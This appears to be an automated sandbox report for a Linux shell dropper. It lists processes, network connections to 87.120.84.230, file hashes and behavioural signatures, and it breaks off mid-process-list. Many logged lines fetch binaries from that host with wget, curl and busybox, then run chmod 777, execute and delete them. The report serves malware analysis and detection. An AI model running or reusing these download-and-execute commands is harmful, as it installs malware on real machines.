/usr/bin/wget

[wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/chmod

[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5

[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/bin/rm

[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]

/usr/bin/wget

[wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/chmod

[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU

[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/bin/rm

[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]

/usr/bin/wget

[wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/chmod

[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf

[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/bin/rm

[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]

/usr/bin/wget

[wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/chmod

[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO

[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/bin/rm

[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]

/usr/bin/wget

[wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/chmod

[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p

[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/bin/rm

[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]

/usr/bin/wget

[wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/chmod

[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX

[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/bin/rm

[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]

/usr/bin/wget

[wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/chmod

[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm

[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/bin/rm

[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]

/usr/bin/wget

[wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/chmod

[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7

[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/rm

[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/usr/bin/wget

[wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/chmod

[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP

[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/bin/rm

[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/usr/bin/wget

[wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/chmod

[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM

[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/bin/rm

[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]

/usr/bin/wget

[wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/chmod

[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ

[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/rm

[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
US 151.101.193.91:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 89.187.167.8:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-29 01:01

Reported

2024-10-29 01:04

Platform

debian9-armhf-20240611-en

Max time kernel

65s

Max time network

70s

Command Line

[/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ N/A
N/A /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 N/A
N/A /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP N/A
N/A /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM N/A
N/A /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 N/A
N/A /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W N/A
N/A /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p N/A
N/A /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm N/A
N/A /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 N/A
N/A /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU N/A
N/A /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf N/A
N/A /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO N/A
N/A /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm N/A
N/A /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX N/A
N/A /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W N/A
N/A /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 N/A
N/A /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm N/A
N/A /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 N/A
N/A /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU N/A
N/A /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf N/A
N/A /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO N/A
N/A /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p N/A
N/A /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX N/A
N/A /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm N/A
N/A /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 N/A
N/A /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP N/A
N/A /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM N/A
N/A /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /usr/bin/curl N/A
File opened for modification /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /usr/bin/curl N/A
File opened for modification /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /usr/bin/curl N/A
File opened for modification /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /usr/bin/curl N/A
File opened for modification /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /usr/bin/curl N/A
File opened for modification /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /usr/bin/curl N/A
File opened for modification /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /usr/bin/curl N/A
File opened for modification /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /usr/bin/curl N/A
File opened for modification /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /usr/bin/curl N/A
File opened for modification /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 /usr/bin/curl N/A
File opened for modification /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /usr/bin/curl N/A
File opened for modification /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 /usr/bin/curl N/A
File opened for modification /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /usr/bin/curl N/A
File opened for modification /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX /usr/bin/curl N/A
File opened for modification /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /usr/bin/curl N/A
File opened for modification /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /usr/bin/curl N/A
File opened for modification /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP /usr/bin/curl N/A
File opened for modification /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM /usr/bin/curl N/A
File opened for modification /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /usr/bin/curl N/A
File opened for modification /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU /usr/bin/curl N/A
File opened for modification /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p /usr/bin/curl N/A
File opened for modification /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf /usr/bin/curl N/A
File opened for modification /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO /usr/bin/curl N/A
File opened for modification /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 /usr/bin/curl N/A
File opened for modification /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ /usr/bin/curl N/A
File opened for modification /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm /usr/bin/curl N/A
File opened for modification /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm /usr/bin/curl N/A
File opened for modification /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W /usr/bin/curl N/A

Processes

/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh

[/tmp/c20d7ad9d1cddf68fa1ddd5a16ee65a6121fb7548c0fa55b4fb4002650d05142.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/chmod

[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ

[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/bin/rm

[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]

/usr/bin/wget

[wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/chmod

[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7

[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/bin/rm

[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]

/usr/bin/wget

[wget http://87.120.84.230/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]

/usr/bin/curl

